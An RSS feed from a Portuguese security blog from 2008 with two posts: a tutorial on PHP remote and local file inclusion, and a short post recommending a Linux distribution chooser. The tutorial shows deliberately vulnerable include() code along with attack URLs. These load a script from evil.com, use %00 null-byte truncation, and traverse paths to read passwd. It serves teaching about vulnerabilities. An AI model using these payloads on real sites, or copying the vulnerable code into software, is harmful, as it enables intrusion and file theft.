<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>int 0x80</title>
	<atom:link href="http://0x80.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://0x80.wordpress.com</link>
	<description></description>
	<pubDate>Sat, 19 Apr 2008 11:05:23 +0000</pubDate>
	<generator>http://wordpress.org/?v=MU</generator>
	<language>pt</language>
			<item>
		<title>PHP - Inclusão local/remota de ficheiros</title>
		<link>http://0x80.wordpress.com/2008/04/19/php-inclusao-arbitraria-de-ficheiros/</link>
		<comments>http://0x80.wordpress.com/2008/04/19/php-inclusao-arbitraria-de-ficheiros/#comments</comments>
		<pubDate>Sat, 19 Apr 2008 11:03:26 +0000</pubDate>
		<dc:creator>afernandesng</dc:creator>
		
		<category><![CDATA[Programação]]></category>

		<category><![CDATA[Segurança]]></category>

		<category><![CDATA[LFI]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[RFI]]></category>

		<guid isPermaLink="false">http://0x80.wordpress.com/?p=10</guid>
		<description><![CDATA[Quando construímos algum programa, temos de ter em conta a segurança. E se esse programa for para acesso público, ainda mais.
É o caso da maior parte das aplicações web. Actualmente as falhas de segurança mais comuns são:

RFI Inclusão remota de ficheiros
LFI Inclusão local de ficheiros
SQL INJECTION
XSS
E outras variantes&#8230;

Exemplos de códigos vulneráveis escritos em PHP e [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Quando construímos algum programa, temos de ter em conta a segurança. E se esse programa for para acesso público, ainda mais.</p>
<p>É o caso da maior parte das aplicações web. Actualmente as falhas de segurança mais comuns são:</p>
<ul>
<li><strong>RFI</strong> Inclusão remota de ficheiros</li>
<li><strong>LFI</strong> Inclusão local de ficheiros</li>
<li><strong>SQL INJECTION</strong></li>
<li><strong>XSS</strong></li>
<li>E outras variantes&#8230;</li>
</ul>
<p>Exemplos de códigos vulneráveis escritos em PHP e respectivos ataque. (RFI e LFI)</p>
<p><strong>Código:</strong></p>
<p>&lt;?php</p>
<p>// php01.php</p>
<p>include($_GET['lang']);</p>
<p>echo &#8220;Seleccionou a linguagem {$_GET['lang']}&#8221;;</p>
<p>?&gt;</p>
<p><strong>Ataque:</strong></p>
<p>http://site-da-victima.pt/php01.php?lang=http://evil.com/xxx.php</p>
<p>Então você pensa, se eu substituir <strong>include($_GET['lang']);</strong> por <strong>include($_GET['lang'].&#8217;lang.php&#8217;);</strong> já não há problema&#8230; Esta muito enganado!!EHEHEH</p>
<p><strong>Código:</strong></p>
<p>&lt;?php</p>
<p>// php01.php</p>
<p>include($_GET['lang'].&#8217;lang.php&#8217;);</p>
<p>echo &#8220;Seleccionou a linguagem {$_GET['lang']}&#8221;;</p>
<p>?&gt;</p>
<p><strong>Ataque:</strong></p>
<p>http://site-da-victima.pt/php01.php?lang=http://evil.com/xxx.php%00</p>
<p>O caracter <strong>%00</strong> corresponde ao <strong></strong> em C, que determinava o fim de uma string. Então o <strong>%00</strong> faz com que tudo que esteja depois seja ignorado. E assim a string <strong>.&#8217;lang.php&#8217; </strong>não será processada.</p>
<p>Se o <strong>%00</strong> não funcionar pode tentar o caracter <strong>?</strong>.</p>
<p>Então você pensa novamente. Se eu substituir <strong>include($_GET['lang'].&#8217;lang.php&#8217;);</strong> por <strong>include(&#8217;./langs/&#8217;.$_GET['lang'].&#8217;lang.php&#8217;);</strong> já não há qualquer hipotese.</p>
<p>Tem razão, em relação a inclusão remota, mas o código continua vulnerável à inclusão local.</p>
<p><strong>Código:</strong></p>
<p>&lt;?php</p>
<p>// php01.php</p>
<p>include(&#8217;./langs/&#8217;.$_GET['lang'].&#8217;lang.php&#8217;);</p>
<p>echo &#8220;Seleccionou a linguagem {$_GET['lang']}&#8221;;</p>
<p>?&gt;</p>
<p><strong>Ataque:</strong></p>
<p>http://site-da-victima.pt/php01.php?lang=../../../../../passwd%00</p>
<p>ou então</p>
<p>http://site-da-victima.pt/php01.php?lang=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fpasswd%00</p>
<p>Também é possível injectar código PHP em imagens, para posteriormente ser executado recorrendo à LFI.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/0x80.wordpress.com/10/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/0x80.wordpress.com/10/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/0x80.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/0x80.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/0x80.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/0x80.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/0x80.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/0x80.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/0x80.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/0x80.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/0x80.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/0x80.wordpress.com/10/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=0x80.wordpress.com&blog=3441672&post=10&subd=0x80&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://0x80.wordpress.com/2008/04/19/php-inclusao-arbitraria-de-ficheiros/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Dificuldades em escolher uma distribuição GNU/Linux&#8230;</title>
		<link>http://0x80.wordpress.com/2008/04/10/dificuldades-em-escolher-uma-distribuicao-gnulinux/</link>
		<comments>http://0x80.wordpress.com/2008/04/10/dificuldades-em-escolher-uma-distribuicao-gnulinux/#comments</comments>
		<pubDate>Thu, 10 Apr 2008 18:26:47 +0000</pubDate>
		<dc:creator>afernandesng</dc:creator>
		
		<category><![CDATA[GNU/Linux]]></category>

		<category><![CDATA[distribuição]]></category>

		<category><![CDATA[distro]]></category>

		<category><![CDATA[Gnu]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[open-source]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://0x80.wordpress.com/?p=3</guid>
		<description><![CDATA[Para resolver este problema, existe um serviço disponibilizado pelo sitio zegeniestudios. Este serviço baseia-se num assistente que faz varias perguntas ao utilizador, com o objectivo de encontrar a melhor  distribuição GNU/Linux para cada caso.
Assim já não tem desculpa para não deixar aquele SO de qualidade duvidosa.
       ]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Para resolver este problema, existe um serviço disponibilizado pelo sitio <a href="http://www.zegeniestudios.net/ldc/" target="_new">zegeniestudios</a>. Este serviço<img class="alignright" style="float:right;" src="http://www.zegeniestudios.net/ldc/images/chooser.png" alt="" width="48" height="48" /> baseia-se num assistente que faz varias perguntas ao utilizador, com o objectivo de encontrar a melhor  <a href="http://pt.wikipedia.org/wiki/Distribui%C3%A7%C3%A3o_Linux" target="_blank">distribuição GNU/Linux</a> para cada caso.</p>
<p>Assim já não tem desculpa para não deixar aquele SO de qualidade duvidosa.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/0x80.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/0x80.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/0x80.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/0x80.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/0x80.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/0x80.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/0x80.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/0x80.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/0x80.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/0x80.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/0x80.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/0x80.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=0x80.wordpress.com&blog=3441672&post=3&subd=0x80&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://0x80.wordpress.com/2008/04/10/dificuldades-em-escolher-uma-distribuicao-gnulinux/feed/</wfw:commentRss>
	
		<media:content url="http://www.zegeniestudios.net/ldc/images/chooser.png" medium="image" />
	</item>
	</channel>
</rss>